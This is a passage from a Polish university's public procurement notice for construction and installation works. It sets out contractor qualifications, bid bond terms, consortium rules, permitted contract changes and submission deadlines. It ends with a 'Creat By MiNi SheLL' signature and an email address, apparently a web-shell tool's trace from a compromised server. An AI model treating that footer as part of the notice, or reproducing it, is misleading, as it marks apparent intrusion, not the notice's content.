ramach którego Wykonawca wykonał konfigurację systemu kontroli dostępu obejmujące co najmniej 200 przejść każde,<br/>VII)	co najmniej jedno zamówienie w ramach którego Wykonawca wykonał konfigurację systemu sygnalizacji pożaru.<br/>b)	Niezależnie od warunków zawartych w lit. a) Zamawiający wymaga aby Wykonawca dysponował (i skierował do realizacji przedmiotu zamówienia) zespołem osób, w skład którego wchodzą co najmniej:<br/>I)	kierownik budowy posiadający uprawniania budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz posiadający zaświadczenie wydane przez Wojewódzkiego Konserwatora Zabytków, że przez co najmniej 18 miesięcy brał udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury (zgodnie z art. 37c ustawy o ochronie zabytków i opiece nad zabytkami) oraz posiadający:<br/>-	minimum 5 letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności <br/>-	doświadczenie związane z prowadzeniem co najmniej jednej budowy lub przebudowy o wartości co najmniej 1 000 000,00 zł brutto,<br/>II)	kierownik robót posiadający uprawniania budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz posiadający: <br/>-	minimum 3 letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności <br/>-	posiadający doświadczenie związane z prowadzeniem robót budowlanych w zakresie dotyczącym instalacji elektrycznych o wartości co najmniej 200 000,00 zł brutto,<br/>III)	kierownik robót posiadający uprawniania budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń oraz posiadający:<br/>-	minimum 3 letnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalności <br/>-	doświadczenie związane z prowadzeniem robót budowlanych w zakresie dotyczącym instalacji sanitarnych o wartości co najmniej 200 000,00 zł brutto,<br/>IV)	co najmniej 2 instalatorów branży elektrycznej posiadających uprawnienia z Grupy G1 do montażu urządzeń elektrycznych oraz wykonywania pomiarów elektrycznych w zakresie Eksploatacji, w tym minimum jednego instalatora w zakresie do Eksploatacji i Dozoru,<br/>V)	co najmniej 2 instalatorów branży sanitarnej posiadających uprawnienia z Grupy G3 do montażu i eksploatacji urządzeń i instalacji gazowych w zakresie Eksploatacji, w tym minimum jednego instalatora w zakresie do Eksploatacji i Dozoru.<br/>VI)	Zamawiający wymaga aby Wykonawca dysponował i skierował do realizacji przedmiotu zamówienia w zakresie instalacji i konfiguracji przejeść objętych Kontrolą Dostępu , co najmniej jedną osobę, która wykaże się dokumentem potwierdzającym odbycie szkolenia z zakresu konfiguracji systemu kontroli dostępu organizowanego przez producenta systemu GENETEC. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz robót budowlanych i instalacyjnych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, w zakresie wartości wskazanym w pkt. VIII. 2.4 a) I) – VII) wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonywania oraz podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowalne zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowalne zostały wykonane , a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Dokument ten ma potwierdzać spełnienie wymagań wskazanych w pkt VIII. 2.4) lit. a – Załącznik nr 5 do SWZ.<br/>b)	wykaz osób skierowanych przez Wykonawcę do wykonania przedmiotu zamówienia – Załącznik nr 6 do SWZ.<br/>c)	oświadczenie Wykonawcy o przychodzie - dokument ten ma potwierdzać spełnienie wymagań wskazanych w pkt VIII. 2.3) SWZ – Załącznik nr 7 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 30 000,00 zł  (słownie: TRZYDZIEŚCI TYSIĘCY ZŁOTYCH 00/100.);<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Santander Bank Polska S.A, 4 Oddział Poznań nr rachunku 08 1090 1476 0000 0001 4228 6053  z dopiskiem „Wadium – ZP/015/24”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP <br/>2)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Uniwersytet Ekonomiczny w Poznaniu.<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>prace wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek dotyczący zdolności<br/>technicznej lub zawodowej wskazany w pkt. VIII musi spełniać co najmniej jeden z członków Konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod warunkiem podpisania aneksu zaakceptowanego przez obydwie Strony, a mianowicie:<br/>1.	Zmianę terminu realizacji przedmiotu zamówienia w następujących przypadkach mających bezpośredni wpływ na terminowość realizacji przedmiotu zamówienia:<br/>1)	spowodowanych niekorzystnymi warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności: <br/>a)	klęski żywiołowe, <br/>b)	warunki atmosferyczne uniemożliwiające prowadzenie robót, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, <br/>c)	odkrycia w trakcie robót obiektów wymagających wcześniejszej rozbiórki lub usunięcia, <br/>d)	odkrycia w trakcie robót konstrukcji, instalacji itp. wymagających wcześniejszej rozbiórki, usunięcia, przełożenia, odnowienia lub tym podobnych prac,<br/>e)	zmiany terminu początkowego rozpoczęcia świadczenia (np. w przypadku przedłużenia procedur przetargowych) z zachowaniem jej terminu końcowego.<br/>2)	będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:<br/>a)	nieterminowe przekazanie przez Zamawiającego terenu, na którym będą prowadzone roboty,<br/>b)	wstrzymanie robót przez Zamawiającego z przyczyn nieleżących po stronie Wykonawcy, <br/>c)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,<br/>3)	z przyczyn niezależnych od Wykonawcy lub Zamawiającego, w szczególności w przypadku okoliczności wystąpienia siły wyższej lub z powodu działania osób trzecich albo z powodu przedłużenia się postępowania o udzielenie zamówienia publicznego uniemożliwiających wykonanie przedmiotu zamówienia lub mających wpływ na terminowość rozpoczęcia wykonania Przedmiotu zamówienia lub zakończenia przedmiotu zamówienia które to przyczyny każda ze Stron musi udokumentować,<br/>4)	opóźnienia w działaniu instytucji opiniujących, uzgadniających oraz wydających decyzje administracyjne ponad czas (termin) wynikający z przepisów prawa,<br/>5)	wejścia w życie nowych przepisów, Polskich Norm po upływie terminu składania ofert, w czasie wykonywania przedmiotu zamówienia, gdy ich wprowadzenie będzie powodować wzrost pracochłonności wykonania danych opracowań lub projektów o więcej niż 5%,<br/>6)	konieczności wykonania robót nie ujętych w dokumentacji projektowej i SWZ, których konieczności wykonania nie można było przewidzieć na dzień zawarcia niniejszej umowy,<br/>7)	konieczności wykonania robót zamiennych, rozumianych w sposób jak niżej:<br/>a)	roboty zamienne polegają na tym, że Wykonawca zobowiązuje się do wykonania zamówienia podstawowego w sposób odmienny od określonego w umowie, <br/>b)	roboty zamienne nie mogą spowodować zwiększenia wynagrodzenia Wykonawcy, chyba że Zamawiający wyrazi na to zgodę.<br/>c)	konieczność wykonania robót zamiennych zachodzi między innymi w sytuacji, gdy: <br/>I)	materiały, osprzęt lub urządzenia przewidziane do wykonania zamówienia, wskazane <br/>w dokumentacji projektowej, nie mogą być użyte przy realizacji przedmiotu zamówienia <br/>z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi lub lepszymi, <br/>II)	w trakcie wykonania przedmiotu zamówienia nastąpiła zmiana przepisów Prawa,<br/>III)	w czasie realizacji robót zmienią się warunki techniczne wykonania przedmiotu zamówienia (np. Polska Norma), <br/>IV)	w trakcie realizacji przedmiotu zamówienia wystąpiła konieczność zmiany technologii wykonania robót budowlanych albo innych prac.<br/>8)	Termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu, o czas niezbędny do wykonywania przedmiotu zamówienia w sposób należyty, nie dłużej jednak, niż o czas trwania okoliczności wymienionych w ust. 1 powyżej.<br/>9)	Zmiany wskazywane w ust. 1 pkt. 6) - 7) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu zamówienia do użytkowania Zamawiającemu zgodnie z jego wymaganiami. <br/>cdn <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/uep</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-13 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 2.	Zmianę zakresu robót, prac lub dostaw lub zmianę ich rodzaju lub zmianę ich ilości, albo zmianę polegająca na zamówieniu dodatkowych robót, prac lub dostaw w przypadku konieczności wykonania robót, prac lub dostaw nie ujętych w dokumentacji projektowej i SWZ, niezbędnych do wykonania przedmiotu zamówienia, a których konieczności wykonania Zamawiający nie mógł przewidzieć w dniu zawarcia niniejszej umowy, w szczególności gdy: <br/>1)	konieczność dokonania zmian jest następstwem odkrycia w toku realizacji przedmiotu zamówienia niezinwentaryzowanych lub ukrytych elementów lub obiektów, kolizji itp., <br/>2)	konieczność dokonania zmian jest następstwem odkrycia w toku realizacji przedmiotu zamówienia niezinwentaryzowanych lub ukrytych zmian konstrukcyjnych, zmian w zakresie użytych materiałów, braków materiałowych lub konstrukcyjnych, innych nieautoryzowanych zmian w sposobie wykonania obiektu lub miejsca, którego dotyczy przedmiot zamówienia;<br/>3)	dokonanie zmian jest niezbędne ze względu na bezpieczeństwo ludzi albo mienia w toku realizacji przedmiotu zamówienia, <br/>4)	dokonanie zmian jest niezbędne dla zabezpieczenia miejsc lub obiektów w toku realizacji przedmiotu zamówienia;<br/>5)	dokonanie zmian jest niezbędne w celu zapobieżenia uszkodzeniom lub awariom istniejących lub realizowanych lub instalowanych obiektów, systemów, instalacji, urządzeń itp.; <br/>3.	Zmianę wynagrodzenia Wykonawcy będąca następstwem zmian opisanych w ust. 2; zmiany te będą dokonywane zgodnie z § 4 ust. 7.<br/>4.	Zmiany osobowe: (...)<br/>10.	Zasady wprowadzenia zmiany do umowy:<br/>1)	Strona występująca o zmianę postanowień niniejszej umowy powinna złożyć wniosek o zmianę postanowień umowy. <br/>2)	Wniosek o zmianę postanowień umowy powinien zawierać:<br/>a)	opis propozycji zmiany,<br/>b)	uzasadnienie zmiany, w tym uprawdopodobnienie okoliczności faktycznych lub prawnych, na które powołuje się wnioskodawca,<br/>c)	opis wpływu zmiany na warunki realizacji umowy.<br/>3)	Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.<br/>11.	Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia w zakresie, w jakim konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub zwłokę ze strony Wykonawcy, włącznie z błędem lub zwłoką w dostarczeniu jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy<br/>Cpęłny tekst zmian w projekcie umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com